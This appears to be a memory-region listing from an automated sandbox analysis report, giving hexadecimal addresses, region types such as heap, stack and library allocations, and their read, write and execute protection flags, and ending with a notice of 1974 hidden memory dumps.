page read and write
76D0000
trusted library allocation
page read and write
2910000
direct allocation
page execute and read and write
2AFD000
heap
page read and write
775E000
stack
page read and write
2E10000
heap
page read and write
28F0000
trusted library allocation
page read and write
7D80000
trusted library allocation
page execute and read and write
32F0000
direct allocation
page execute and read and write
464000
unkown
page execute and read and write
2FC9000
stack
page read and write
78A6000
heap
page read and write
77F0000
trusted library allocation
page read and write
8230000
trusted library allocation
page execute and read and write
7F0D0000
trusted library allocation
page execute and read and write
960F000
stack
page read and write
5F81000
trusted library allocation
page read and write
731D000
stack
page read and write
4D60000
trusted library allocation
page read and write
6D4D000
heap
page read and write
4DA000
heap
page read and write
C09000
unkown
page execute and read and write
55F6000
trusted library allocation
page read and write
2AFE000
direct allocation
page execute and read and write
70F0000
trusted library allocation
page read and write
32C9000
trusted library allocation
page read and write
33F1000
heap
page read and write
2947000
heap
page read and write
3F5E000
stack
page read and write
2E13000
heap
page read and write
723B000
trusted library allocation
page read and write
8FE1000
heap
page read and write
2B00000
heap
page read and write
324000
unkown
page execute and read and write
7A4E000
stack
page read and write
753A000
heap
page read and write
6133000
trusted library allocation
page read and write
4D97000
heap
page read and write
4AF0000
trusted library allocation
page read and write
D10000
heap
page read and write
E10000
heap
page read and write
708B000
stack
page read and write
4B80000
heap
page readonly
768000
unkown
page execute and read and write
4C40000
trusted library allocation
page execute and read and write
56AB000
trusted library allocation
page read and write
2FDA000
trusted library allocation
page execute and read and write
30E0000
heap
page read and write
737F000
stack
page read and write
3DDE000
stack
page read and write
2AD4000
heap
page read and write
21B000
unkown
page execute and read and write
4DA000
heap
page read and write
42DE000
stack
page read and write
2A20000
direct allocation
page execute and read and write
7465000
heap
page execute and read and write
7C52000
trusted library allocation
page read and write
8369000
heap
page read and write
7BE0000
trusted library allocation
page read and write
31F0000
heap
page read and write
4DA000
heap
page read and write
7BF0000
trusted library allocation
page read and write
7FB78000
trusted library allocation
page execute and read and write
7C4F000
stack
page read and write
5EB6000
trusted library allocation
page read and write
890E000
stack
page read and write
50C9000
trusted library allocation
page read and write
E9F000
heap
page read and write
4D3000
heap
page read and write
5FE8000
trusted library allocation
page read and write
937E000
stack
page read and write
1400000
heap
page read and write
6DCB000
stack
page read and write
770E000
stack
page read and write
2ACF000
heap
page read and write
4D50000
trusted library allocation
page read and write
3F0E000
stack
page read and write
75AA000
heap
page read and write
2B5B000
heap
page read and write
A520000
heap
page read and write
494E000
stack
page read and write
5F51000
trusted library allocation
page read and write
5CA000
unkown
page execute and read and write
4920000
trusted library allocation
page read and write
417E000
stack
page read and write
82F2000
heap
page read and write
2FB3000
trusted library allocation
page execute and read and write
4813000
trusted library allocation
page read and write
77DE000
stack
page read and write
2A30000
heap
page read and write
4390000
heap
page execute and read and write
2F7E000
stack
page read and write
4A5E000
stack
page read and write
2DBA000
trusted library allocation
page execute and read and write
147E000
stack
page read and write
8937000
trusted library allocation
page read and write
7F3B0000
trusted library allocation
page execute and read and write
47D1000
trusted library allocation
page read and write
6D3E000
stack
page read and write
2A6C000
direct allocation
page execute and read and write
7AF0000
heap
page read and write
A538000
heap
page read and write
76C0000
trusted library allocation
page read and write
7C2E000
stack
page read and write
3450000
heap
page read and write
92E000
stack
page read and write
796C000
stack
page read and write
9C80000
heap
page read and write
6113000
trusted library allocation
page read and write
2D8F000
stack
page read and write
E45000
heap
page read and write
500000
heap
page read and write
60E0000
trusted library allocation
page read and write
32B4000
trusted library allocation
page read and write
2E2E000
heap
page read and write
4C3C000
stack
page read and write
5956000
trusted library allocation
page read and write
2880000
direct allocation
page execute and read and write
FF0000
heap
page read and write
300000
unkown
page execute and read and write
3E4E000
stack
page read and write
43B0000
heap
page read and write
2EB0000
heap
page read and write
7180000
trusted library allocation
page read and write
77D000
unkown
page execute and read and write
4923000
trusted library allocation
page read and write
8ADC000
heap
page read and write
60A000
heap
page read and write
72C5000
trusted library allocation
page read and write
4BCE000
stack
page read and write
84A3000
heap
page read and write
21D000
unkown
page execute and read and write
324E000
stack
page read and write
4C0000
heap
page read and write
2A10000
remote allocation
page read and write
7160000
trusted library allocation
page read and write
4E4D000
trusted library allocation
page execute and read and write
37AE000
stack
page read and write
4A90000
heap
page execute and read and write
410F000
stack
page read and write
838E000
stack
page read and write
4B9E000
stack
page read and write
6156000
trusted library allocation
page read and write
4F1E000
stack
page read and write
737E000
stack
page read and write
7640000
trusted library allocation
page execute and read and write
882D000
heap
page read and write
2EE0000
heap
page read and write
3E1E000
stack
page read and write
35DF000
stack
page read and write
2DCE000
stack
page read and write
3FAE000
stack
page read and write
12F7000
stack
page read and write
4180000
heap
page readonly
3300000
heap
page read and write
333F000
unkown
page read and write
7F6F000
trusted library allocation
page read and write
4250000
trusted library allocation
page read and write
7D92000
heap
page read and write
4D64000
trusted library allocation
page read and write
2C75000
heap
page read and write
758E000
stack
page read and write
4E0E000
stack
page read and write
5C3000
unkown
page execute and read and write
2900000
trusted library allocation
page read and write
48F0000
heap
page read and write
8A24000
heap
page read and write
495E000
stack
page read and write
2DB0000
trusted library allocation
page read and write
7BC0000
trusted library allocation
page read and write
7DF0000
trusted library allocation
page read and write
1330000
heap
page read and write
684B000
stack
page read and write
32CF000
stack
page read and write
3197000
heap
page read and write
372D000
trusted library allocation
page execute and read and write
2D8C000
stack
page read and write
88CD000
stack
page read and write
7FE4000
trusted library allocation
page read and write
617D000
trusted library allocation
page read and write
7162000
trusted library allocation
page read and write
3F8E000
stack
page read and write
6BAE000
stack
page read and write
4DE7000
heap
page read and write
6A4D000
stack
page read and write
70B0000
trusted library allocation
page read and write
3D2F000
stack
page read and write
865B000
trusted library allocation
page read and write
5262000
trusted library allocation
page read and write
7D70000
trusted library allocation
page read and write
50D6000
trusted library allocation
page read and write
3240000
heap
page read and write
74D0000
trusted library allocation
page read and write
733E000
stack
page read and write
870E000
stack
page read and write
53C1000
trusted library allocation
page read and write
80F0000
heap
page read and write
6F7000
unkown
page execute and read and write
682C000
stack
page read and write
6127000
trusted library allocation
page read and write
174E000
stack
page read and write
32B0000
trusted library allocation
page read and write
316E000
stack
page read and write
81E0000
heap
page read and write
4D3000
heap
page read and write
32C0000
heap
page read and write
73B1000
heap
page read and write
88E0000
trusted library allocation
page execute and read and write
1618000
heap
page read and write
706E000
stack
page read and write
3403000
heap
page read and write
4CFC000
stack
page read and write
4936000
trusted library allocation
page execute and read and write
9026000
heap
page read and write
83FC000
heap
page read and write
8D90000
trusted library allocation
page read and write
2AF5000
heap
page read and write
7435000
heap
page execute and read and write
2910000
trusted library allocation
page read and write
30D0000
direct allocation
page execute and read and write
82C8000
heap
page read and write
4F62000
trusted library allocation
page read and write
4F20000
trusted library allocation
page read and write
7CD0000
trusted library allocation
page read and write
8130000
heap
page read and write
A8ED000
stack
page read and write
8422000
heap
page read and write
8980000
trusted library allocation
page read and write
82C4000
heap
page read and write
9A8E000
stack
page read and write
3388000
heap
page read and write
4F81000
trusted library allocation
page read and write
5CF000
unkown
page execute and read and write
4CCE000
stack
page read and write
7BDB000
heap
page read and write
2F70000
trusted library section
page read and write
53E1000
trusted library allocation
page read and write
764A000
stack
page read and write
7C40000
trusted library allocation
page read and write
4D01000
trusted library allocation
page read and write
1230000
heap
page read and write
74E0000
heap
page read and write
77E0000
heap
page read and write
4E78000
trusted library allocation
page read and write
8240000
trusted library allocation
page read and write
370E000
stack
page read and write
2FA7000
heap
page read and write
47CE000
stack
page read and write
430F000
stack
page read and write
704E000
stack
page read and write
70D0000
trusted library allocation
page read and write
2FE0000
heap
page read and write
7AF0000
heap
page read and write
E5A000
heap
page read and write
391E000
stack
page read and write
154E000
stack
page read and write
8620000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
2E53000
heap
page read and write
7660000
trusted library allocation
page read and write
2920000
trusted library allocation
page read and write
4C50000
trusted library allocation
page read and write
41F0000
heap
page read and write
77FE000
stack
page read and write
7B5A000
heap
page read and write
7B90000
trusted library allocation
page read and write
849E000
heap
page read and write
68CE000
stack
page read and write
400F000
stack
page read and write
AA29000
stack
page read and write
E72000
heap
page read and write
83E4000
heap
page read and write
409E000
stack
page read and write
7E20000
trusted library allocation
page read and write
32A0000
heap
page read and write
4AA0000
trusted library allocation
page execute and read and write
4D63000
trusted library allocation
page execute and read and write
81DD000
stack
page read and write
4F3B000
trusted library allocation
page execute and read and write
2B15000
heap
page read and write
4F6000
heap
page read and write
902E000
heap
page read and write
985000
heap
page read and write
4E6A000
trusted library allocation
page execute and read and write
7405000
heap
page read and write
5A2A000
trusted library allocation
page read and write
8160000
heap
page read and write
2C70000
heap
page read and write
2A10000
remote allocation
page read and write
45AE000
stack
page read and write
7D95000
heap
page read and write
96E000
stack
page read and write
5071000
trusted library allocation
page read and write
27EF000
unkown
page read and write
D46000
unkown
page execute and read and write
1550000
heap
page read and write
E5D000
heap
page read and write
77D0000
trusted library allocation
page read and write
7C50000
trusted library allocation
page read and write
320E000
stack
page read and write
CF7000
stack
page read and write
2EFF000
stack
page read and write
6A0E000
stack
page read and write
89D0000
heap
page read and write
8E8F000
stack
page read and write
13D0000
heap
page read and write
87E2000
trusted library allocation
page read and write
88F2000
heap
page read and write
2F2E000
stack
page read and write
6124000
trusted library allocation
page read and write
907F000
stack
page read and write
5B0000
heap
page read and write
7250000
trusted library allocation
page execute and read and write
7370000
trusted library allocation
page read and write
8494000
heap
page read and write
344D000
heap
page read and write
538A000
trusted library allocation
page read and write
16BF000
stack
page read and write
493A000
trusted library allocation
page execute and read and write
3740000
heap
page read and write
1417000
heap
page read and write
7D2E000
stack
page read and write
616000
heap
page read and write
14F0000
direct allocation
page execute and read and write
751A000
heap
page read and write
2E1C000
heap
page read and write
7F60000
trusted library allocation
page read and write
D45000
heap
page read and write
2AF5000
heap
page read and write
810000
heap
page read and write
32AE000
stack
page read and write
5438000
trusted library allocation
page read and write
75B2000
heap
page read and write
887E000
stack
page read and write
1358000
heap
page read and write
79F0000
trusted library allocation
page read and write
754B000
heap
page read and write
DD5000
heap
page read and write
79D0000
trusted library allocation
page read and write
301E000
stack
page read and write
2AD3000
heap
page read and write
2B2C000
heap
page read and write
4E66000
trusted library allocation
page execute and read and write
743E000
heap
page read and write
82C0000
heap
page read and write
45CE000
stack
page read and write
75A6000
trusted library allocation
page read and write
71D000
stack
page read and write
8AC1000
heap
page read and write
932E000
stack
page read and write
8E23000
trusted library allocation
page read and write
53E9000
trusted library allocation
page read and write
2DF0000
heap
page read and write
5F89000
trusted library allocation
page read and write
5130000
trusted library allocation
page read and write
717000
unkown
page execute and read and write
480F000
stack
page read and write
7B9D000
trusted library allocation
page read and write
903D000
heap
page read and write
992E000
stack
page read and write
5B5000
unkown
page execute and read and write
2AD7000
heap
page read and write
4D40000
trusted library section
page read and write
74EE000
stack
page read and write
15D8000
heap
page read and write
3A5E000
stack
page read and write
896B000
stack
page read and write
2D9D000
trusted library allocation
page execute and read and write
DE0000
direct allocation
page execute and read and write
60D4000
trusted library allocation
page read and write
32D3000
direct allocation
page execute and read and write
2E60000
heap
page read and write
811D000
trusted library allocation
page read and write
4D7000
heap
page read and write
7B9B000
trusted library allocation
page read and write
56B8000
trusted library allocation
page read and write
4D5E000
stack
page read and write
73CAD000
unkown
page read and write
30EA000
heap
page read and write
4AD5000
trusted library allocation
page read and write
51A1000
trusted library allocation
page read and write
87FD000
stack
page read and write
45C000
stack
page read and write
6D73000
heap
page read and write
34AF000
stack
page read and write
78D000
stack
page read and write
2A5C000
stack
page read and write
8770000
trusted library allocation
page read and write
771E000
stack
page read and write
50C0000
trusted library allocation
page read and write
72C0000
trusted library allocation
page read and write
30F000
unkown
page execute and read and write
41F7000
heap
page read and write
32E2000
trusted library allocation
page read and write
448E000
stack
page read and write
420E000
stack
page read and write
760000
heap
page read and write
448E000
stack
page read and write
E9A000
heap
page read and write
6CAE000
stack
page read and write
7B83000
heap
page read and write
88FE000
heap
page read and write
2AC8000
heap
page read and write
4F10000
heap
page execute and read and write
7360000
heap
page execute and read and write
539000
unkown
page execute and read and write
759E000
stack
page read and write
3421000
heap
page read and write
73DB000
heap
page read and write
73B9000
stack
page read and write
1393000
heap
page read and write
5161000
trusted library allocation
page read and write
32A0000
direct allocation
page execute and read and write
77B0000
trusted library allocation
page read and write
31B0000
heap
page read and write
3C0F000
stack
page read and write
9D000
stack
page read and write
32F0000
heap
page read and write
675000
unkown
page execute and read and write
7282000
heap
page read and write
8840000
trusted library allocation
page execute and read and write
67E000
unkown
page execute and read and write
6C4E000
stack
page read and write
3604000
trusted library allocation
page read and write
5299000
trusted library allocation
page read and write
30DE000
stack
page read and write
481E000
stack
page read and write
There are 1974 hidden memdumps, click here to show them.